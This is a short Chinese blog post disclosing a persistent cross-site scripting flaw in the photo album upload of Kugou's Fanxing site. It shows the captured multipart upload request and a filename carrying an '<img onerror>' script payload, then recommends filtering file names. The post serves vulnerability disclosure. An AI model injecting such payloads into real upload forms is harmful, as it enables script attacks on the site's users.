最新消息:

酷狗旗下分站持久型XSS跨站攻击

xss admin 1620浏览 0评论

这个漏洞在酷狗旗下的繁星网:

fanxing.kugou.com
情景再现:
 20130823113200282

 

情况分析:
20130823113201906
繁星网相册处因为对上传的文件名没有做很好的过滤,我们只要开启抓包软件
看到提交的数据是:
—————————–234891716625512\r\nContent-Disposition: form-data; name=”photo”; filename=”aaaaaaaaa.jpg”\r\nContent-Type: image/jpeg\r\n\r\nÿØÿà
在提交的文件名内插入XSS代码,那我们提交的数据就应该是:
—————————–234891716625512\r\nContent-Disposition: form-data; name=”photo”; filename=”aaaaaaaaa<img src=1 onerror=alert(1)>.jpg”\r\nContent-Type: image/jpeg\r\n\r\nÿØÿà
上传成功以后就可以进行XSS跨站攻击了!
修复方案:

对文件名进行过滤

转载请注明:jinglingshu的博客 » 酷狗旗下分站持久型XSS跨站攻击

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址